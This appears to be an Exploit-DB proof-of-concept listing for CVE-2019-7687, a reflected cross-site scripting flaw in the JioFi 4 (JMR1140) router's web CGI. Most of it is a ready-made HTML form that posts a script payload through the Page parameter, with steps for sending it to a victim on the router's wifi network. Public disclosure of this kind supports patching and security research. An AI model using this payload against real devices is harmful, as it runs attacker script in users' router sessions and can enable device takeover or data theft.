Lucene search
Exploit-DBEDB-ID:46363HistoryFeb 13, 2019 - 12:00 a.m.
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
2019-02-1300:00:00
Exploit-DB
www.exploit-db.com
224
0.003 Low
EPSS
Percentile
69.6%
# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687
Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.
1. Create a poc.html and insert
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>
2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .
Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.Related
nvd
nvd
CVE-2019-7687
2019-05-07 19:29:01
cve
cve
CVE-2019-7687
2019-05-07 19:29:01
cvelist
cvelist
CVE-2019-7687
2019-05-07 18:58:07
prion
prion
Cross site scripting
2019-05-07 19:29:00
zdt
zdt